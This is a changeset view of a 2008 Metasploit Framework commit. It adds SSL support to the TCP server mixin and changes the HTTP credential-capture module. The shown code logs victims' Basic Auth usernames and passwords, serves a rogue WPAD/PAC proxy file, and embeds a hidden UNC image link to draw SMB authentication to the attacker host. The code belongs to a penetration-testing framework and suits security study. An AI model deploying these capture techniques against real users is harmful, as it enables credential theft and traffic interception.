Changeset 5452
- Timestamp:
- 03/22/08 01:34:52 (2 months ago)
- Files:
-
- framework3/trunk/external/ruby-lorcon/Makefile (deleted)
- framework3/trunk/lib/msf/core/exploit/tcp.rb (modified) (3 diffs)
- framework3/trunk/lib/rex/socket/ssl_tcp_server.rb (modified) (2 diffs)
- framework3/trunk/modules/auxiliary/server/capture/http.rb (modified) (4 diffs)
Legend:
- Unmodified
- Added
- Removed
- Modified
- Copied
- Moved
framework3/trunk/lib/msf/core/exploit/tcp.rb
r5051 r5452 252 252 register_options( 253 253 [ 254 Opt::SSL, 254 255 OptAddress.new('SRVHOST', [ true, "The local host to listen on.", '0.0.0.0' ]), 255 OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]) 256 OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]), 256 257 ], Msf::Exploit::Remote::TcpServer) 257 258 … … 310 311 'LocalHost' => srvhost, 311 312 'LocalPort' => srvport, 313 'SSL' => ssl, 312 314 'Context' => 313 315 { … … 391 393 392 394 # 395 # Returns the SSL option 396 # 397 def ssl 398 datastore['SSL'] 399 end 400 401 402 # 393 403 # Re-generates the payload, substituting the current RHOST and RPORT with 394 404 # the supplied client host and port from the socket. framework3/trunk/lib/rex/socket/ssl_tcp_server.rb
r3616 r5452 26 26 def accept(opts = {}) 27 27 sock = super() 28 if (sock) 29 sock.extend(Rex::Socket::Tcp) 30 sock.context = self.context 31 pn = sock.getpeername 28 return nil if not sock 29 30 sock.extend(Rex::Socket::Tcp) 31 sock.context = self.context 32 pn = sock.getpeername 32 33 33 sock.peerhost = pn[1] 34 sock.peerport = pn[2] 35 end 36 t = OpenSSL::SSL::SSLSocket.new(sock, self.sslctx) 37 t.extend(Rex::Socket::Tcp) 38 t.accept 39 40 t 34 begin 35 t = OpenSSL::SSL::SSLSocket.new(sock, self.sslctx) 36 t.extend(Rex::Socket::Tcp) 37 t.peerhost = pn[1] 38 t.peerport = pn[2] 39 t.accept 40 t 41 rescue ::OpenSSL::SSL::SSLError 42 sock.close 43 nil 44 end 41 45 end 42 46 … … 66 70 cert.subject = subject 67 71 cert.issuer = issuer 68 cert.not_before = Time.now 69 cert.not_after = Time.now + 360072 cert.not_before = Time.now - 7200 73 cert.not_after = Time.now + 7200 70 74 cert.public_key = key.public_key 71 75 ef = OpenSSL::X509::ExtensionFactory.new(nil,cert) framework3/trunk/modules/auxiliary/server/capture/http.rb
r5451 r5452 54 54 55 55 def run 56 @myhost = datastore['SRVHOST'] 57 @myport = datastore['SRVPORT'] 56 58 exploit() 57 59 end … … 92 94 93 95 def dispatch_request(cli, req) 94 96 97 mysrc = Rex::Socket.source_address(cli.peerhost) 98 hhead = (req['Host'] || @myhost).split(':', 2)[0] 99 95 100 if(req['Authorization'] and req['Authorization'] =~ /basic/i) 96 101 basic,auth = req['Authorization'].split(/\s+/) … … 99 104 :host => cli.peerhost, 100 105 :proto => 'http', 101 :targ_host => req['Host'] || datastore['SRVHOST'],102 :targ_port => datastore['SRVPORT'],106 :targ_host => hhead, 107 :targ_port => @myport, 103 108 :user => user, 104 109 :pass => pass, 105 110 :extra => req.resource.to_s 106 111 ) 107 print_status("HTTP LOGIN #{ req['Host']}:#{datastore['SRVPORT']} #{user} / #{pass} => #{req.resource}")112 print_status("HTTP LOGIN #{cli.peerhost} > #{hhead}:#{@myport} #{user} / #{pass} => #{req.resource}") 108 113 end 109 114 110 115 if(req.resource =~ /^wpad.dat|.*\.pac$/i) 111 prx = "function FindProxyForURL(url, host) { return 'PROXY #{ Rex::Socket.source_address(cli.peerhost)}:#{datastore['SRVPORT']}'; }"116 prx = "function FindProxyForURL(url, host) { return 'PROXY #{mysrc}:#{@myport}'; }" 112 117 res = 113 118 "HTTP/1.1 200 OK\r\n" + 114 "Host: #{ req['Host'] || datastore['SRVHOST']}\r\n" +119 "Host: #{hhead}\r\n" + 115 120 "Content-Type: application/x-ns-proxy-autoconfig\r\n" + 116 121 "Content-Length: #{prx.length}\r\n" + … … 121 126 end 122 127 123 print_status("HTTP REQUEST #{ req['Host']}:#{datastore['SRVPORT']} #{req.resource}")128 print_status("HTTP REQUEST #{cli.peerhost} > #{hhead}:#{@myport} #{req.method} #{req.resource}") 124 129 125 data = "<html><head><title>Connecting...</title></head><body><img src='\\\\#{ Rex::Socket.source_address(cli.peerhost)}\\public\\loading.jpg' width='1' height='1'></body></html>"130 data = "<html><head><title>Connecting...</title></head><body><img src='\\\\#{mysrc}\\public\\loading.jpg' width='1' height='1'></body></html>" 126 131 res = 127 132 "HTTP/1.1 200 OK\r\n" +
